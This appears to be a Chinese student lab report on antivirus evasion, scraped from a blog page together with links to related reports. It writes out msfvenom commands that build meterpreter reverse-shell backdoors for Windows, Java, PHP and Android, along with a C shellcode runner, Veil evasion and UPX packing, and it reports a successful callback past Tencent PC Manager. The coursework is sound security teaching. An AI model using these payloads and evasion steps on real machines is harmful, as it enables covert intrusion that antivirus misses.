2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践

  • 一、实验说明

  • 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)

  • 1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)

(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

  • 1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5))

  • 实验准备

  • 上次实验中,我们生成了一个超可爱的后门程序,但是它有一个很明显的使用限制就是需要关闭防火墙和杀软。现如今几乎每台电脑都有安装防火墙,win10系统更是自带了防火墙,所以病毒程序毫无用武之地。

  • 这次实验,就是为了让我们的病毒程序躲避防火墙和杀软的追杀,来实现更好的入侵他人电脑(不)。

  • 我们将之前的后门文件放在VirSCAN.org中进行扫描看看:

  • 很明显被认为是病毒了

  • 我们使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe指令进行25次编码看看:

  • 发现没有什么用,可想而知,msfvenom被大多数人熟知,它的编码器也被很多杀软记录在库中。

  • 这里我们需要学会使用msfvenom生成如jar之类的其他文件:

  • 生成jar文件msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.183.130 lport=5330 x> 20165330_backdoor_java.jar

  • 生成php文件msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.183.130 lport=5330 x> 20165330_backdoor.php

  • 生成apk文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.183.130 LPORT=5330 R > 20165330_backdoor.apk

  • 好了,既然msfvenom不行,我们就换一个

  • 进入veil,启动use evasion,设置好回连的IP地址和端口号后,使用generate生成后门文件:

  • 放到virscan.org上扫描一下:

  • 还是会被杀软检测出来。

  • 我们利用生成的shellcode编写后门程序,半手工打造恶意软件:

  • 我们使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 -f c生成c语言程序的后门,使用vim生成5225.c程序,并加入刚刚的buf和老师在课上给的主函数

int main()

{

    int (*func)() = (int(*)())buf;

    func();

}

  • 扫描后发现一片和谐,运行的时候杀软都没有提示,但是放在virscan.org还是能查出来,并且有些之前感觉很菜的杀软都可以查出来...:

  • 再进行加壳尝试吧。使用UPX 5225.exe -0 5225nb.exe对生成的后门程序加壳:

  • 尝试在别人的电脑上回连也成功了,电脑的版本:Windows 10,杀软名称版本:腾讯电脑管家。(不能放图鸭)

  • 实验中遇到的问题及思考

  • 问题:安装veil到头裂都安不好

  • 解决方法:拷别人的虚拟机

  • 实验总结及体会

  • 好讨厌安东西...从周3安到周6还是没有成功。实验本身还是挺有意义的,但是总感觉实战还是会遇到很多问题...黑别人看来也不是那么容易成功的鸭

  • 二、基础问题回答

  • 问:杀软是如何检测出恶意代码的?

  • 通过特征码,这是比较基础的了,容易被欺骗,还有通过行为判断。

  • 问:免杀是做什么?

  • 通过使用一些技术手段,让杀毒软件无法识别并分析主机中的恶意代码。

  • 问:免杀的基本方法有哪些?

  • 改变特征码:只有exe——加壳

  • 有shellcode——利用shellcode生成可执行文件,有源代码——用其他语言重写再编译(php,java等),尽量使用反弹式连接、使用隧道技术、加密通讯数据等。基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码等。

2018-2019-2 网络对抗技术 20165225 Exp3 免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

随机推荐

  1. mysql慢日志, 锁表情况查询

    2018-5-29 9:10:15 星期二 锁表情况查询: show OPEN TABLES where In_use > ; 慢日志记录: 1. 修改配置文件, 重启服务后永久生效 slow_ ...

  2. OpenCV3编程入门读书笔记4-形态学滤波

    一.腐蚀和膨胀 1.腐蚀和膨胀的主要功能 (1)消除噪声 (2)分割出独立的图像元素,在图像中连接相邻的元素 (3)寻找图像中的极大值或者极小值区域 (4)求出图像的梯度 2.膨胀(dilate) 膨 ...

  3. 非root用户安装java版本

    有时候,我们所用的用户并不是root用户,升级java版本,其实是一个非常简单的过程,具体过程如下: 将下载好的tar包进行解压,然后进行配置文件,在命令行敲入  vi ~/.bashrc,在这个文件 ...

  4. C#常用的单元测试框架

    C#常用的单元测试框架有XUnit .NUnit .MSTest 做过单元测试的同学大概都知道以上几种测试框架,这几种框架除了标注测试类和方法的特性用的不一样之外,XUnit 和 NUnit 是非常相 ...

  5. Razor---服务器端标记语言

    Razor 是一种允许您向网页中嵌入基于服务器的代码(Visual Basic 和 C#)的标记语法<ul> @for (int i = 0; i < 10; i++) { < ...

  6. 微信支付的安全漏洞之XXE

    1.场景:国外安全社区公布微信支付官方SDK存在严重漏洞,可导致商家服务器被入侵(绕过支付的效果).目前,漏洞详细信息以及攻击方式已被公开,影响范围巨大(已确认陌陌.vivo因使用该SDK而存在该漏洞 ...

  7. 论文阅读笔记四十:Deformable ConvNets v2: More Deformable, Better Results(CVPR2018)

    论文源址:https://arxiv.org/abs/1811.11168 摘要 可变形卷积的一个亮点是对于不同几何变化的物体具有适应性.但也存在一些问题,虽然相比传统的卷积网络,其神经网络的空间形状 ...

  8. pta编程总结1

    7-1 打印沙漏 (20 分) 本题要求你写个程序把给定的符号打印成沙漏的形状.例如给定17个"*",要求按下列格式打印 所谓"沙漏形状",是指每行输出奇数个符 ...

  9. 使用 Sonar 检测代码质量

    经历了一段时间的加班赶项目进度之后,今天终于闲下来了.忽然不知道干啥.于是,想着做点什么吧.突然想起了码云上面有个代码分析的功能,用的是 Sonar 于是想来玩玩这个. 一.下载Sonar,和初始化, ...

  10. 读文件/写文件。http请求。读取文件列表。

    package transfor; import java.io.*; import java.net.HttpURLConnection; import java.net.URL; import j ...